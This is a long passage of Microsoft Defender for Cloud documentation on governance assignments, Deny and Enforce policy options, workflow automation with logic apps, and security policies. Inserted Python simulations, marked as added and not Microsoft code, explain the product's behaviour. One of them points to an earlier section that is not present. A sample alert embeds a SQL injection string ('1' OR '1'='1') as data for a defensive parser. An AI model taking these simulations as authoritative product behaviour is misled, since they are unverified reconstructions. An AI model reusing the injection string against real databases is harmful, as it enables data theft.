unless they become overdue.


To manually assign owners and due dates to recommendations:

1. Go to the list of recommendations:

   • In the Defender for Cloud overview, select Security posture and then select
     View recommendations for the environment that you want to improve.
   • Go to Recommendations in the Defender for Cloud menu.

2. In the list of recommendations, use the Potential score increase to identify the
   security control that contains recommendations that will increase your secure
   score.

   Tip

   You can also use the search box and filters above the list of recommendations
   to find specific recommendations.

3. Select a recommendation to see the affected resources.
4. For any resource that doesn't have an owner or due date, select the resources and
   select Assign owner.
5. Enter the email address of the owner that needs to make the changes that
   remediate the recommendation for those resources.
6. Select the date by which to remediate the recommendation for the resources.
7. You can select Apply grace period to keep the resource from affecting the secure
   score until it's overdue.
8. Select Save.


The recommendation is now shown as assigned and on time.


Tracking the status of recommendations for 
further action 


After you define governance rules, you'll want to review the progress that the owners 
are making in remediating the recommendations. 


You can track the assigned and overdue recommendations in:

• The security posture page, which shows the number of unassigned and overdue
  recommendations.

  [Screenshot: the Security posture tile with Recommendations (total, overdue and unassigned counts), the overall secure score, and a secure score per environment (Azure, AWS, GCP), with an "Explore your security posture" link.]

• The list of recommendations, which shows the governance status of each
  recommendation.


[Screenshot: Microsoft Defender for Cloud > Recommendations, showing 79 subscriptions, with a Governance (preview) summary of overdue and unassigned recommendations, the "Show my items only (preview)" toggle, and a Recommendation status filter. The table columns are Name, Max score, Current score, Potential score increase, Status, Unhealthy resources and Insights; controls such as Enable MFA, Secure management ports, Apply system updates, Remediate vulnerabilities, Remediate security configurations, Restrict unauthorized network access, Encrypt data in transit and Manage access and permissions are listed with their potential score increase (for example +10% for Enable MFA), an Overdue status and counts such as 9 of 23 resources. The toolbar offers Refresh, Download CSV report, Open query, Governance report (preview), and Guides & Feedback.]

• The governance report in the governance rules settings, which lets you drill down into
  recommendations by rule and owner.


[Screenshot: the Governance (Preview) workbook, with a Subscription selector at the top.]


Tracking progress by rule with the governance report


The governance report lets you select subscriptions that have governance rules and, for 
each rule and owner, shows you how many recommendations are completed, on time, 
overdue, or unassigned. 

Note

Manual assignments will not appear on this report. To see all assignments by
owner, use the Owner tab on the Security Posture page.


To review the status of the recommendations in a rule:

1. In Recommendations, select Governance report.
2. Select the subscriptions that you want to review.
3. Select the rules that you want to see details about.


You can see the list of owners and recommendations for the selected rules, and their
status.


To see the list of recommendations for each owner:

1. Select Security posture.
2. Select the Owner tab to see the list of owners and the number of overdue
   recommendations for each owner.

   • Hover over the (i) in the overdue recommendations to see the breakdown of
     overdue recommendations by severity.
   • If the owner email address is found in the organizational Azure Active
     Directory (Azure AD), you'll see the full name and picture of the owner.

3. Select View recommendations to go to the list of recommendations associated
   with the owner.


Next steps 


In this article, you learned how to set up a process for assigning owners and due dates 
to tasks so that owners are accountable for taking steps to improve your security 
posture. 


Check out how owners can set ETAs for tasks so that they can manage their progress. 


Learn how to Implement security recommendations in Microsoft Defender for Cloud. 


Prevent misconfigurations with 
Enforce/Deny recommendations 


Article • 07/24/2023


Security misconfigurations are a major cause of security incidents. Defender for Cloud
can help prevent misconfigurations of new resources with regard to specific
recommendations. This feature can help keep your workloads secure and stabilize your
secure score.


Enforcing a secure configuration, based on a specific recommendation, is offered in two
modes:

• Using the Deny effect of Azure Policy, you can stop unhealthy resources from
  being created.
• Using the Enforce option, you can take advantage of Azure Policy's
  DeployIfNotExists effect and automatically remediate non-compliant resources
  upon creation.


The ability to secure configurations can be found at the top of the resource details page
for selected security recommendations (see Recommendations with deny/enforce
options).
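The difference between the two modes, and between them and the default Audit effect that produces the unhealthy resources shown in a recommendation, as an added Python example that is not code from the documentation, from Azure Policy or from Defender for Cloud. It implements a small evaluator for the subset of Azure Policy rule syntax used here (field, equals, notEquals, exists, allOf, anyOf, not) and runs it over constructed storage-account creation requests. The rule mirrors the intent of the "Secure transfer to storage accounts should be enabled" recommendation but is simplified; the alias-to-property mapping, the PATCH body applied on the Enforce path and the request records are assumptions for illustration, not the product's remediation template.

```python
"""Audit vs Deny vs DeployIfNotExists for a secure-transfer policy (added example)."""
from copy import deepcopy
from dataclasses import dataclass
from typing import Any, Dict, Optional

_MISSING = object()   # marks a field absent from the request (e.g. an older API version)

# Simplified rule in Azure Policy syntax (assumption: not the built-in definition's exact text).
SECURE_TRANSFER_RULE = {
    "if": {
        "allOf": [
            {"field": "type", "equals": "Microsoft.Storage/storageAccounts"},
            {"anyOf": [
                {"field": "Microsoft.Storage/storageAccounts/supportsHttpsTrafficOnly",
                 "exists": "false"},
                {"field": "Microsoft.Storage/storageAccounts/supportsHttpsTrafficOnly",
                 "equals": "false"},
            ]},
        ]
    },
    "then": {"effect": "[parameters('effect')]"},
}

# Body the Enforce path applies after creation (assumed for illustration).
REMEDIATION_PATCH = {"properties": {"supportsHttpsTrafficOnly": True}}


def _field(resource: Dict[str, Any], field: str) -> Any:
    """Resolve a policy field; aliases are mapped to their last segment under 'properties'."""
    if field == "type":
        return resource.get("type", _MISSING)
    prop = field.rsplit("/", 1)[-1]
    return resource.get("properties", {}).get(prop, _MISSING)


def _norm(value: Any) -> str:
    return str(value).lower()   # Azure Policy string comparison is case-insensitive


def evaluate(condition: Dict[str, Any], resource: Dict[str, Any]) -> bool:
    """Evaluate the subset of Azure Policy condition syntax used in this example."""
    if "allOf" in condition:
        return all(evaluate(c, resource) for c in condition["allOf"])
    if "anyOf" in condition:
        return any(evaluate(c, resource) for c in condition["anyOf"])
    if "not" in condition:
        return not evaluate(condition["not"], resource)
    value = _field(resource, condition["field"])
    if "exists" in condition:
        return (value is not _MISSING) == (_norm(condition["exists"]) == "true")
    if "equals" in condition:
        return value is not _MISSING and _norm(value) == _norm(condition["equals"])
    if "notEquals" in condition:
        return value is _MISSING or _norm(value) != _norm(condition["notEquals"])
    raise ValueError(f"unsupported condition: {condition}")


@dataclass(frozen=True)
class Decision:
    effect: str
    created: bool                    # did the creation request go through?
    compliant_after: bool            # does a healthy resource exist afterwards?
    remediation: Optional[dict]      # PATCH applied by DeployIfNotExists, if any


def remediate(resource: Dict[str, Any], patch: Dict[str, Any]) -> Dict[str, Any]:
    fixed = deepcopy(resource)
    fixed.setdefault("properties", {}).update(patch["properties"])
    return fixed


def apply_policy(rule: Dict[str, Any], request: Dict[str, Any], effect: str) -> Decision:
    if effect not in ("Audit", "Deny", "DeployIfNotExists"):
        raise ValueError(f"unsupported effect: {effect}")
    if not evaluate(rule["if"], request):
        return Decision(effect, True, True, None)           # already compliant
    if effect == "Deny":
        return Decision(effect, False, False, None)         # request rejected, nothing created
    if effect == "Audit":
        return Decision(effect, True, False, None)          # created; shows as unhealthy
    fixed = remediate(request, REMEDIATION_PATCH)           # DeployIfNotExists: create, then fix
    return Decision(effect, True, not evaluate(rule["if"], fixed), REMEDIATION_PATCH)


# Constructed creation requests (not real resources).
REQUESTS = {
    "http-allowed": {"type": "Microsoft.Storage/storageAccounts", "name": "stdemo01",
                     "properties": {"supportsHttpsTrafficOnly": False}},
    "property-missing": {"type": "Microsoft.Storage/storageAccounts", "name": "stdemo02",
                         "properties": {}},
    "https-only": {"type": "Microsoft.Storage/storageAccounts", "name": "stdemo03",
                   "properties": {"supportsHttpsTrafficOnly": True}},
    "not-storage": {"type": "Microsoft.Sql/servers", "name": "sqldemo01", "properties": {}},
}


def decide_all(effect: str) -> Dict[str, Decision]:
    return {name: apply_policy(SECURE_TRANSFER_RULE, req, effect) for name, req in REQUESTS.items()}


if __name__ == "__main__":
    for eff in ("Audit", "Deny", "DeployIfNotExists"):
        for name, d in decide_all(eff).items():
            print(f"{eff:18} {name:17} created={d.created!s:5} compliant={d.compliant_after}")
```

Note the request with the property missing: it is caught by the `exists: false` branch, which is why the real definition checks both the absent and the `false` case rather than `notEquals: true` alone. Deny leaves nothing behind to remediate, Audit creates the unhealthy resource the recommendation later lists, and DeployIfNotExists creates it and then applies the fix, which is the operation the earlier section says is logged to the activity log.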


Prevent resource creation 


1. Open the recommendation that your new resources must satisfy, and select the 
Deny button at the top of the page. 


[Screenshot: the recommendation "Secure transfer to storage accounts should be enabled" (severity High, freshness interval 30 min) with the Deny button in its toolbar. Affected resources: Unhealthy resources (102), Healthy resources (166), Not applicable resources (0), listed by storage account name and subscription.]

The configuration pane opens listing the scope options. 


2. Set the scope by selecting the relevant subscription or management group. 


@ Tip 


You can use the three dots at the end of the row to change a single 
subscription, or use the checkboxes to select multiple subscriptions or groups 
then select Change to Deny. 


[Screenshot: the "Deny - Prevent resource creation (Preview)" pane, covering 41 subscriptions. It reads: "Set the scope for the deny effect of your Azure Policy. The deny effect prevents the creation of resources that don't satisfy the recommendation. Learn more about the Azure Policy deny effect." A management group ("Contoso", 5 of 5 subscriptions) and its subscriptions are listed with their current effect (Deny or Audit), each row offering Change to Deny or Change to audit.]


Enforce a secure configuration 


1. Open the recommendation for which a template should be deployed automatically when new resources don't satisfy it, and select the Enforce button at the top of the page.


[Screenshot: the recommendation page for "Auditing on SQL server should be enabled", showing the Enforce button, severity High, a 30 min freshness interval, and the Affected resources tab with 26 unhealthy, 21 healthy and 0 not applicable SQL servers, plus Remediate and Trigger Logic App actions.]


The configuration pane opens with all of the policy configuration options. 


[Screenshot: the "Assign policy" pane for the "Deploy Auditing on SQL servers" policy definition, with Basics, Parameters, Remediation and Review + create tabs, and fields for Scope, Exclusions, Assignment name, Description and Policy enforcement (Enabled/Disabled).]


2. Set the scope, assignment name, and other relevant options. 


3. Select Review + create. 
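The difference between the two modes, as an added example that is not part of this page or of Microsoft's code: a Python simulation of how Azure Policy treats a non-compliant resource under Audit, Deny and DeployIfNotExists. The resource shapes, the compliance checks standing in for the two recommendations shown above, and the "template" that turns auditing on are constructed stand-ins, and the remediation_task flag models the Remediation tab option rather than any real API.

```python
"""Added example (not Microsoft code): how the Azure Policy effects behind
Defender for Cloud's Audit / Deny / Enforce options treat one resource.
Resource shapes and checks are constructed, simplified stand-ins."""

from __future__ import annotations

from dataclasses import dataclass, replace

AUDIT, DENY, DINE = "Audit", "Deny", "DeployIfNotExists"


@dataclass(frozen=True)
class Resource:
    name: str
    resource_type: str
    properties: dict


def secure_transfer_ok(r: Resource) -> bool:
    """Stand-in for 'Secure transfer to storage accounts should be enabled'."""
    return r.properties.get("supportsHttpsTrafficOnly") is True


def sql_auditing_ok(r: Resource) -> bool:
    """Stand-in for 'Auditing on SQL server should be enabled'."""
    return r.properties.get("auditingState") == "Enabled"


def deploy_sql_auditing(r: Resource) -> Resource:
    """Stand-in for the template a DeployIfNotExists assignment deploys."""
    return replace(r, properties={**r.properties, "auditingState": "Enabled"})


# resource type -> (compliance check, remediation template or None).
# Recommendations that ship no template can be assigned Deny but not Enforce.
POLICIES = {
    "Microsoft.Storage/storageAccounts": (secure_transfer_ok, None),
    "Microsoft.Sql/servers": (sql_auditing_ok, deploy_sql_auditing),
}


def evaluate(r: Resource, effect: str, *, is_new_request: bool,
             remediation_task: bool = False) -> tuple[str, Resource | None]:
    """Return (outcome, resulting resource) for one assignment.

    is_new_request   True for a create/update request reaching Resource Manager,
                     False for a resource that already exists in the scope.
    remediation_task Whether a remediation task exists for the assignment
                     (the Remediation tab option); only matters for DINE.
    """
    check, template = POLICIES[r.resource_type]
    if check(r):
        return "compliant", r
    if effect == DENY:
        # Deny is evaluated on create/update only; it never alters what exists.
        return ("rejected", None) if is_new_request else ("non-compliant", r)
    if effect == DINE and template is not None:
        # New resources are remediated right after creation; existing ones
        # only when a remediation task is created for the assignment.
        if is_new_request or remediation_task:
            return "remediated", template(r)
        return "non-compliant", r
    # Audit (or DINE without a template): the resource stays as-is and is flagged.
    return "non-compliant", r


if __name__ == "__main__":
    # Constructed sample resources
    http_storage = Resource("legacystore", "Microsoft.Storage/storageAccounts",
                            {"supportsHttpsTrafficOnly": False})
    quiet_sql = Resource("sqlsrv01", "Microsoft.Sql/servers",
                         {"auditingState": "Disabled"})

    print(evaluate(http_storage, DENY, is_new_request=True)[0])    # rejected
    print(evaluate(http_storage, DENY, is_new_request=False)[0])   # non-compliant
    print(evaluate(quiet_sql, DINE, is_new_request=True)[0])       # remediated
    print(evaluate(quiet_sql, DINE, is_new_request=False)[0])      # non-compliant
    print(evaluate(quiet_sql, DINE, is_new_request=False,
                   remediation_task=True)[0])                      # remediated
```

The point to take from the simulation: Deny only ever rejects create and update requests, so the unhealthy storage accounts already in the subscription stay unhealthy until someone fixes them, and DeployIfNotExists only touches pre-existing resources when a remediation task is created for the assignment.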


Recommendations with deny/enforce options

These recommendations can be used with the deny option:

- [Enable if required] Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest
- [Enable if required] Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK)
- [Enable if required] Cognitive Services accounts should enable data encryption with a customer-managed key (CMK)
- [Enable if required] Container registries should be encrypted with a customer-managed key (CMK)
- Access to storage accounts with firewall and virtual network configurations should be restricted
- Automation account variables should be encrypted
- Azure Cache for Redis should reside within a virtual network
- Azure Spring Cloud should use network injection
- Container CPU and memory limits should be enforced
- Container images should be deployed from trusted registries only
- Container with privilege escalation should be avoided
- Containers sharing sensitive host namespaces should be avoided
- Containers should only use allowed AppArmor profiles
- Immutable (read-only) root filesystem should be enforced for containers
- Key Vault keys should have an expiration date
- Key Vault secrets should have an expiration date
- Key vaults should have purge protection enabled
- Key vaults should have soft delete enabled
- Least privileged Linux capabilities should be enforced for containers
- Privileged containers should be avoided
- Redis Cache should allow access only via SSL
- Running containers as root user should be avoided
- Secure transfer to storage accounts should be enabled
- Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign
- Service Fabric clusters should only use Azure Active Directory for client authentication
- Services should listen on allowed ports only
- Storage account public access should be disallowed
- Storage accounts should be migrated to new Azure Resource Manager resources
- Storage accounts should restrict network access using virtual network rules
- Usage of host networking and ports should be restricted
- Usage of pod HostPath volume mounts should be restricted to a known list to restrict node access from compromised containers
- Validity period of certificates stored in Azure Key Vault should not exceed 12 months
- Virtual machines should be migrated to new Azure Resource Manager resources
- Web Application Firewall (WAF) should be enabled for Application Gateway
- Web Application Firewall (WAF) should be enabled for Azure Front Door Service


These recommendations can be used with the enforce option:

- Auditing on SQL server should be enabled
- Azure Arc-enabled Kubernetes clusters should have Microsoft Defender for Cloud's extension installed
- Azure Backup should be enabled for virtual machines
- Microsoft Defender for App Service should be enabled
- Microsoft Defender for container registries should be enabled
- Microsoft Defender for Key Vault should be enabled
- Microsoft Defender for Kubernetes should be enabled
- Microsoft Defender for Resource Manager should be enabled
- Microsoft Defender for Servers should be enabled
- Microsoft Defender for Azure SQL Database servers should be enabled
- Microsoft Defender for SQL servers on machines should be enabled
- Microsoft Defender for SQL should be enabled for unprotected Azure SQL servers
- Microsoft Defender for Storage should be enabled
- Azure Policy Add-on for Kubernetes should be installed and enabled on your clusters
- Diagnostic logs in Azure Stream Analytics should be enabled
- Diagnostic logs in Batch accounts should be enabled
- Diagnostic logs in Data Lake Analytics should be enabled
- Diagnostic logs in Event Hub should be enabled
- Diagnostic logs in Key Vault should be enabled
- Diagnostic logs in Logic Apps should be enabled
- Diagnostic logs in Search services should be enabled
- Diagnostic logs in Service Bus should be enabled


Next steps 


Automate responses to Microsoft Defender for Cloud triggers 


Automate responses to Microsoft Defender for Cloud triggers

Article • 06/18/2023


Every security program includes multiple workflows for incident response. These 
processes might include notifying relevant stakeholders, launching a change 
management process, and applying specific remediation steps. Security experts 
recommend that you automate as many steps of those procedures as you can. 
Automation reduces overhead. It can also improve your security by ensuring the process 
steps are done quickly, consistently, and according to your predefined requirements. 


This article describes the workflow automation feature of Microsoft Defender for Cloud. 
This feature can trigger consumption logic apps on security alerts, recommendations, 
and changes to regulatory compliance. For example, you might want Defender for Cloud 
to email a specific user when an alert occurs. You'll also learn how to create logic apps 
using Azure Logic Apps. 


Availability

Aspect                          Details
Release state:                  General availability (GA)
Pricing:                        Free
Required roles and permissions: Security admin role or Owner on the resource group. Must also have write permissions for the target resource.
                                To work with Azure Logic Apps workflows, you must also have the following Logic Apps roles/permissions:
                                - Logic App Operator permissions, or Logic App read/trigger access (this role can't create or edit logic apps; only run existing ones)
                                - Logic App Contributor permissions for logic app creation and modification
                                If you want to use Logic Apps connectors, you may need other credentials to sign in to their respective services (for example, your Outlook/Teams/Slack instances).
Clouds:                         Commercial clouds; National (Azure Government, Azure China 21Vianet)


Create a logic app and define when it should automatically run


1. From Defender for Cloud's sidebar, select Workflow automation. 


[Screenshot: the Microsoft Defender for Cloud | Workflow automation page, with an "Add workflow automation" button, Refresh and Delete actions, filters, and a table of existing automations with columns Name, Scope, Trigger Type and Description.]
From this page you can create new automation rules, enable, disable, or delete existing ones.


Note

A scope refers to the subscription where the workflow automation is deployed.


2. To define a new workflow, select Add workflow automation. The options pane for your new automation opens.


[Screenshot: the "Add workflow automation" pane opening beside the Workflow automation page.]


Here you can enter: 


a. Aname and description for the automation. 


b. The triggers that will initiate this automatic workflow. For example, you might want your logic app to run when a security alert that contains "SQL" is generated.
© Note 


If your trigger is a recommendation that has "sub-recommendations", for 
example Vulnerability assessment findings on your SQL databases should 
be remediated, the logic app will not trigger for every new security finding; 
only when the status of the parent recommendation changes. 


c. The consumption logic app that will run when your trigger conditions are met. 


3. From the Actions section, select visit the Logic Apps page to begin the logic app 
creation process. 


[Screenshot: the trigger and Actions sections of the "Add workflow automation" pane. Alert severity defaults to all severities. Under Actions: "Configure the Logic App that will be triggered. Choose an existing Logic App or visit the Logic Apps page to create a new one", with a subscription selector, the Logic App name dropdown and a Refresh link.]


You'll be taken to Azure Logic Apps. 


4. Select (+) Add. 


[Screenshot: the "Create Logic App" page in Azure Logic Apps with Basics, Hosting, Monitoring, Tags and Review + create tabs, and the Project Details subscription and resource group fields.]
5. Fill out all required fields and select Review + Create.

6. Review the information you entered and select Create.

The message Deployment is in progress appears. Wait for the deployment complete notification to appear and select Go to resource from the notification.

In your new logic app, you can choose from built-in, predefined templates from the security category. Or you can define a custom flow of events to occur when this process is triggered.


Tip

Sometimes in a logic app, parameters are included in the connector as part of a string and not in their own field. For an example of how to extract parameters, see step #14 of Working with logic app parameters while building Microsoft Defender for Cloud workflow automations.


The logic app designer supports the following Defender for Cloud triggers: 


e When a Microsoft Defender for Cloud Recommendation is created or 
triggered - If your logic app relies on a recommendation that gets 
deprecated or replaced, your automation will stop working and you'll need to 
update the trigger. To track changes to recommendations, use the release 
notes. 


e When a Defender for Cloud Alert is created or triggered - You can 
customize the trigger so that it relates only to alerts with the severity levels 
that interest you. 


e When a Defender for Cloud regulatory compliance assessment is created or triggered - Trigger automations based on updates to regulatory compliance assessments.


O Note 


If you are using the legacy trigger "When a response to a Microsoft Defender 
for Cloud alert is triggered", your logic apps will not be launched by the 
Workflow Automation feature. Instead, use either of the triggers mentioned 
above. 




7. After you've defined your logic app, return to the workflow automation definition pane ("Add workflow automation"). Select Refresh to ensure your new logic app is available for selection.


[Screenshot: the Actions section of the "Add workflow automation" pane, with the subscription selector and the Logic App name dropdown.]


8. Select your logic app and save the automation. The logic app dropdown only 
shows those with supporting Defender for Cloud connectors mentioned above. 


Manually trigger a logic app

You can also run logic apps manually when viewing any security alert or recommendation.

To manually run a logic app, open an alert or a recommendation and select Trigger logic app:


[Screenshot: the security alert "PREVIEW - Role binding to the cluster-admin role detected" on resource ASC-IGNITE-DEMO (severity Low, state Active, detected by Microsoft). The description reads: "Kubernetes audit log analysis detected a new binding to the cluster-admin role which gives administrator privileges. Unnecessary administrator privileges might cause privilege escalation in the cluster." The Trigger Logic App button is at the bottom of the pane.]


Configure workflow automation at scale using the supplied policies


Automating your organization's monitoring and incident response processes can greatly 
improve the time it takes to investigate and mitigate security incidents. 


To deploy your automation configurations across your organization, use the supplied Azure Policy DeployIfNotExists policies described below to create and configure workflow automation procedures. Get started with workflow automation templates.

To implement these policies:


1. From the table below, select the policy you want to apply: 


Goal                                                  Policy                                                                            Policy ID
Workflow automation for security alerts               Deploy Workflow Automation for Microsoft Defender for Cloud alerts                f1525828-9a90-4fcf-be48-268cdd02361e
Workflow automation for security recommendations      Deploy Workflow Automation for Microsoft Defender for Cloud recommendations       73d6ab6c-2475-4850-afd6-43795f3492ef
Workflow automation for regulatory compliance changes Deploy Workflow Automation for Microsoft Defender for Cloud regulatory compliance 509122b9-ddd9-47ba-a5f1-d0dac20be63c


Tip

You can also find these by searching Azure Policy:

a. Open Azure Policy.

[Screenshot: the Azure portal search box with "policy" entered, showing the Policy service among the results.]

b. From the Azure Policy menu, select Definitions and search for them by name.


2. From the relevant Azure Policy page, select Assign. 


[Screenshot: the policy definition page for "Deploy Workflow Automation for Microsoft Defender for Cloud recommendations" (available effect: DeployIfNotExists; category: Security Center; definition version 5.0.0; policy type BuiltIn; mode All). Its description reads: "Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions and triggers on the assigned scope." An Assign button is at the top of the page.]


3. Open each tab and set the parameters as desired:

a. In the Basics tab, set the scope for the policy. To use centralized management, assign the policy to the Management Group containing the subscriptions that will use the workflow automation configuration.

b. In the Parameters tab, enter the required information.


[Screenshot: the "Assign policy" page for the recommendations policy, Parameters tab, with the required fields Automation name, Resource group name, Resource group location, Logic App and Logic app trigger.]


c. (Optional) A DeployIfNotExists assignment only acts on resources created or updated after it is assigned. To apply it to subscriptions that already exist in the scope, open the Remediation tab and select the option to create a remediation task.


4. Review the summary page and select Create. 


Data types schemas 


To view the raw event schemas of the security alerts or recommendations events passed to the logic app, visit the Workflow automation data types schemas. This can be useful in cases where you aren't using Defender for Cloud's built-in Logic Apps connectors mentioned above, but instead are using the generic HTTP connector - you could use the event JSON schema to manually parse it as you see fit.
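A handler for the payload that reaches a logic app through the generic HTTP connector, as an added example rather than code from this page or from Microsoft. It re-implements the "alert name contains SQL" and severity trigger conditions from the procedure above, and it copes with a connector that hands ExtendedProperties over as a JSON string instead of as its own field, which is the situation the tip about logic app parameters describes. The sample alert and its field names are constructed for this example; take the authoritative names from the data types schemas page.

```python
"""Added example (not Microsoft code): parsing the alert JSON that workflow
automation posts to a logic app, re-applying the trigger conditions and
extracting a value that may arrive embedded in a string.  The alert below
is constructed and its field names are assumptions, not the published schema."""

from __future__ import annotations

import json

# Constructed sample alert (field names assumed, see lead-in).
SAMPLE_ALERT = json.dumps({
    "AlertDisplayName": "Potential SQL injection",
    "AlertType": "SQL.DB_PotentialSqlInjection",
    "Severity": "High",
    "StartTimeUtc": "2023-06-18T10:15:00Z",
    "CompromisedEntity": "security-demo-server",
    "Description": "A possible SQL injection was detected against the database.",
    "ExtendedProperties": {
        "Client Principal Name": "app@contoso.example",
        "Statement": "SELECT * FROM users WHERE id = '1' OR '1'='1'",
    },
})

# The same alert as some connectors deliver it: the nested object is a string.
_as_dict = json.loads(SAMPLE_ALERT)
SAMPLE_ALERT_STRINGIFIED = json.dumps(
    {**_as_dict, "ExtendedProperties": json.dumps(_as_dict["ExtendedProperties"])})
SAMPLE_LOW_ALERT = json.dumps({**_as_dict, "Severity": "Low"})

SEVERITY_RANK = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}


def matches_trigger(alert: dict, *, name_contains: str, min_severity: str) -> bool:
    """Mirror the 'alert name contains ...' and severity trigger conditions."""
    name_ok = name_contains.lower() in alert.get("AlertDisplayName", "").lower()
    sev_ok = SEVERITY_RANK.get(alert.get("Severity", ""), -1) >= SEVERITY_RANK[min_severity]
    return name_ok and sev_ok


def extended_property(alert: dict, key: str) -> str | None:
    """Read ExtendedProperties whether it arrives as an object or as a JSON string."""
    props = alert.get("ExtendedProperties")
    if isinstance(props, str):
        try:
            props = json.loads(props)
        except json.JSONDecodeError:
            return None
    if not isinstance(props, dict):
        return None
    return props.get(key)


def build_notification(raw_body: str, *, name_contains: str = "SQL",
                       min_severity: str = "Medium") -> dict | None:
    """Turn the raw HTTP body into the fields a notification step needs.

    Returns None when the alert does not meet the trigger conditions, which is
    what a condition step in the logic app would do before any action runs.
    """
    alert = json.loads(raw_body)
    if not matches_trigger(alert, name_contains=name_contains, min_severity=min_severity):
        return None
    return {
        "subject": f"[{alert['Severity']}] {alert['AlertDisplayName']} "
                   f"on {alert.get('CompromisedEntity')}",
        "alert_type": alert.get("AlertType"),
        "principal": extended_property(alert, "Client Principal Name"),
        "statement": extended_property(alert, "Statement"),
        "start_time": alert.get("StartTimeUtc"),
    }


if __name__ == "__main__":
    print(json.dumps(build_notification(SAMPLE_ALERT), indent=2))
    print(build_notification(SAMPLE_LOW_ALERT))   # None: below Medium
```

The severity ordering lives in one table so the trigger filter and any later routing agree on it; a payload with an unknown severity value is rejected rather than treated as the lowest level.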


Next steps 


In this article, you learned about creating logic apps, automating their execution in 
Defender for Cloud, and running them manually. For more information, see the 
following documentation: 


- Use workflow automation to automate a security response
- Security recommendations in Microsoft Defender for Cloud
- Security alerts in Microsoft Defender for Cloud
- Workflow automation data types schemas
- Check out common questions about Defender for Cloud.


Manage security policies 


Article e 03/30/2023 


This page explains how security policies are configured, and how to view them in 
Microsoft Defender for Cloud. 


To understand the relationships between initiatives, policies, and recommendations, see 
What are security policies, initiatives, and recommendations? 


Who can edit security policies? 


Defender for Cloud uses Azure role-based access control (Azure RBAC), which provides built-in roles you can assign to Azure users, groups, and services. When users open Defender for Cloud, they see only information related to the resources they can access, which means they hold the Owner, Contributor, or Reader role on the resource's subscription. There are two specific Defender for Cloud roles that can view and manage security policies:


- Security reader: Has rights to view Defender for Cloud items such as recommendations, alerts, policy, and health. Can't make changes.

- Security admin: Has the same view rights as security reader. Can also update the security policy and dismiss alerts.


You can edit Azure security policies through Defender for Cloud, Azure Policy, via REST 
API or using PowerShell. 


Manage your security policies 


To view your security policies in Defender for Cloud: 


1. From Defender for Cloud's menu, open the Environment settings page. Here, you can see the Azure management groups or subscriptions.

2. Select the relevant subscription or management group whose security policies you want to view.

3. Open the Security policy page.

4. The security policy page for that subscription or management group appears. It shows the available and assigned policies.


[Screenshot: the Settings | Security policy page for a subscription. The "Default initiative" section shows the assignments applying to the scope with columns Assignment, Assigned On, Audit policies, Deny policies, Disabled policies and Exempted policies: ASC Default, assigned on the subscription, with 195 audit, 1 deny, 12 disabled and 0 exempted policies, and an Enable Monitoring assignment from the management group with 193 audit, 0 deny, 15 disabled and 0 exempted. The "Industry & regulatory standards" section lists the compliance initiatives shown in the Regulatory compliance dashboard, such as Microsoft cloud security benchmark and PCI DSS 3.2.1, each marked "Out of the box" with a Disable action.]


O Note 


The settings of each recommendation that apply to the scope are compared 
and the cumulative outcome of actions taken by the recommendation 
appears. For example, if in one assignment, a recommendation is Disabled, 
but in another it's set to Audit, then the cumulative effect applies Audit. The 
more active effect always takes precedence. 


5. Choose from the available options on this page: 


a. To work with industry standards, select Add more standards. For more 
information, see Customize the set of standards in your regulatory compliance 
dashboard. 


b. To assign and manage custom initiatives, select Add custom initiatives. For 
more information, see Using custom security initiatives and policies. 


c. To view and edit the default initiative, select it and proceed as described below. 


[Screenshot: the Security policy page for another subscription, showing the Default initiative and the out-of-the-box standards Microsoft cloud security benchmark, PCI DSS 3.2.1, ISO 27001 and SOC TSP, each with a Disable action, followed by an "Add more standards" link.]


This Security policy screen reflects the action taken by the policies assigned on 
the subscription or management group you selected. 


- Use the links at the top to open a policy assignment that applies on the subscription or management group. These links let you access the assignment and manage recommendations. For example, if you see that a particular recommendation is set to the audit effect, use the link to change it to deny or to disable it from being evaluated.

- In the list of recommendations, you can see the effective application of the recommendation on your subscription or management group.

- The recommendations' effect can be:

  Audit evaluates the compliance state of resources according to recommendation logic.

  Deny prevents deployment of non-compliant resources based on recommendation logic.

  Disabled prevents the recommendation from running.
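How the cumulative outcome described in the note above is arrived at, as an added example that is not Microsoft's code: a Python function that resolves the effective effect of each recommendation on a subscription from every assignment in scope, including the ones inherited from management groups, with the more active effect winning. The management-group tree, the assignment scopes and the effects are constructed.

```python
"""Added example (not Microsoft code): effective recommendation effects on a
subscription when several initiative assignments overlap.  Tree, assignments
and effects are constructed."""

from __future__ import annotations

# Least to most active, as the page describes: Disabled < Audit < Deny.
ACTIVITY = {"Disabled": 0, "Audit": 1, "Deny": 2}

# Constructed management-group tree: child scope -> parent management group.
PARENT = {
    "sub-prod-01": "mg-prod",
    "sub-prod-02": "mg-prod",
    "mg-prod": "mg-root",
}

SQL_AUDIT = "Auditing on SQL server should be enabled"
SECURE_TRANSFER = "Secure transfer to storage accounts should be enabled"

# Constructed assignments: (scope, {recommendation: effect}).
# An assignment on a management group applies to every subscription beneath it.
ASSIGNMENTS = [
    ("mg-root", {SQL_AUDIT: "Audit", SECURE_TRANSFER: "Audit"}),
    ("mg-prod", {SECURE_TRANSFER: "Deny"}),
    ("sub-prod-01", {SQL_AUDIT: "Disabled"}),
    ("sub-prod-02", {SECURE_TRANSFER: "Disabled"}),
]


def scope_chain(subscription: str) -> list[str]:
    """The subscription itself plus every management group above it."""
    chain, node = [subscription], subscription
    while node in PARENT:
        node = PARENT[node]
        chain.append(node)
    return chain


def effective_effects(subscription: str, assignments=ASSIGNMENTS) -> dict[str, str]:
    """Per recommendation, the most active effect among all assignments in scope."""
    in_scope = set(scope_chain(subscription))
    result: dict[str, str] = {}
    for scope, effects in assignments:
        if scope not in in_scope:
            continue
        for rec, effect in effects.items():
            current = result.get(rec)
            if current is None or ACTIVITY[effect] > ACTIVITY[current]:
                result[rec] = effect
    return result


def still_generated(subscription: str, recommendation: str) -> bool:
    """True when some assignment in scope keeps the recommendation active,
    so disabling it on the subscription alone does not silence it."""
    effect = effective_effects(subscription).get(recommendation, "Disabled")
    return ACTIVITY[effect] > 0


if __name__ == "__main__":
    for sub in ("sub-prod-01", "sub-prod-02"):
        print(sub, effective_effects(sub))
    # sub-prod-01 disabled SQL auditing locally, but mg-root still audits it.
    print(still_generated("sub-prod-01", SQL_AUDIT))   # True
```

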